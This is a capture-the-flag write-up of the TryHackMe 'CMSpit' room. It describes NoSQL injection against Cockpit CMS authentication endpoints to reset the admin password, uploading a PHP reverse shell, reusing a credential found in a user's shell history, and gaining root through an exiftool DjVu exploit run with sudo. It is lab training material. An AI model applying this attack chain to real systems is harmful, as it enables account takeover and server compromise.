TryHackMe|CMSpit
Hello everybody,welcome to my another writeup.This one is from tryhackme.Here is the link of the room.After completing this room we’ll learn NoSql Injection,Manual exploitation without using any kind of msf modules and knowledge about the latest vulnereabilities in the binaries for privesc.
Let’s begin…
Requirements:
→Knowledge about NoSQL databases like mangodb.
→writing own exploit(not necessary)
→understanding the article about the exploiting methods and perform it manually.
I’m using ubuntu as my attacker OS and connected to tryhackme through openvpn.This one is one of the most interesting room.So , let’s begin the hunt.
Information gathering:
In this phase,we need to collect the information about the vulnerable host as much as possible.Information including Operating System,open ports,services that are running in those open ports and their versions.
For port scanning i’m going to use rustscan because it is fast and time saving thing.Usually nmap takes lot time to scan ports.So instead of using nmap i’m going to use rustscan.
“rustscan -b 500 -a 10.10.149.67 — ulimit 5000”
We got only two open ports. So let’s scan them with nmap using defaults scripts and version scan.
“nmap -sC -sV 10.10.149.67 -vv -oN scan”
So, After nmap scan. We found that it is running ubuntu and running ssh in 22 and httpd in port 80.Now we have all the information about the vulnerable host.Now let’s move into next phase..
Enumeration:
So in this phase we are going to find the way for getting the initial foot hold to get our reverse shell.In this phase generally we’ll enumerate hidden directories and exploits for the services that are running. So first let’s open the website and look what’s running in there….
It’s login page running on express engine.So let’s enumerate some stuff here.After using gobuster ,Nothing found.But there is something interesting thing in the web page.That is cockpit. So i search for cockpit and found some interesting article on cockpit cms.Here is the link. check that article.We are going to use that article to find our way in.
Initaial Foot hold:
After reading the article,basically it’s a metasploit module.But we are not going to use this module.Instead of using an automated module,we are going to exploit it a manual way.In the end i’m gonna post the python based exploit inspired from msf module.Let’s go.
Finding Users:
For find using, we are going to exploit the nosql injection in /auth/check uri to get the users.For this i’m going to use burp.So, let’s fireup the burp and start hunting….
So this is the request header for login.So let’s inject our NoSql payload in user parameter…
Now this is our request header.we have injected the NoSQL payload in user.After sending this to the server.We’ll getback with the this response.
ok,there are 4 users.Now ,let’s find the tokens for the users inorder to change their passwords.
Getting Tokens:
For gettting tokens,We are going to user /auth/resetpassword to get the reset token.So let’s change the uri in the burpsuite.and also change the json to token.
So here is the req. header. after sending this header. we’ll get the response like this.
So we got one token. So let’s find the user information associated this particular token.
Getting User details:
For getting user details we need to send this token to /auth/newpassword.It will give us the user details to whom it is related to.
So here the req. header
After sending the token to the server. we’ll get the response back with the user details.
So this token is related to the admin user.So now let’s change his password using this reset token.
Resetting the password:
For resetting the user password we need to send a req. to /auth/resetpassword along with the reset token and password.
So here the req. header. token along with the password we want to use.After sending this req. to the server . The server will respond with success message.
OK password is updated. now we can login as the admin user.Let’s do it.
Gaining Access:
After logged as admin.We’ll find /finder folder.
Using this finder. we can upload files.But we can’t change.So let’s upload our reverse shell here.
“cp /opt/webshells/php/php-reverse-shell.php shell.php”
My web shells are in /opt dir. so i copied one from that dir.Now let’s change the Ip and upload the shell.
So i’ve uploaded the shell.Now let’s get the reverse shell.
So we got our shell.Now let’s Escalate our privileges to the user.
After playing around.in /home/stux i found something interesting.
There is a file .dbshell we’ll get one flag and stux password. Now let’s ssh as stux.
After logged in as stux .We can get user.txt we had the password. so Let’s see if stux can run anything as root.
“sudo -l”
So stux can run exiftool as root.We can find one method in gtfobins. But It won’t work.There is a wonderful article explaining about this vulnerability in exiftool.Click here to read it.After going through the article i found it interesting.For exploiting this vulnerability there is an exploit in github.Here is the link
After getting the exploit. we need to change the Ip address in the exploit.
After running this exploit.
“python3 exploit.py”
You’ll get a .djvu file.Which using the djvu libraries.
Now send that .djvu file to the victim.and start a listener at port 9090.
So you can see there is my exploit.djvu now let’s run this using exiftool.
We got a shell.Let’s check the id.
HURRAY we are root. and we succesfully completed the box.
NOTE:I publish my exploit in python for this room in github to automate the process for resetting the password. Don’t forget to follow me on github.
THANK YOU….
HAPPY HACKING>>>>;)
If you have any doubts Let me know :
FOLLOW ME on:
Insta:https://www.instagram.com/sampath.pendurthi/
LinkedIn:https://in.linkedin.com/in/sampath-pendurthi
Github:https://github.com/LetMeHackYou/
And i really want to showcase this room on youtube. On Aug 14 I’ll post the walkthrough of this room where i’ll be writing my own automate exploit in python.So Don’t forget to follow me on youtube For writeup videos and my cyber security related content….
YOUTUBE:https://www.youtube.com/channel/UCERB7WCXSI5SaM0_q7oS0hA
THANK YOU<<>>
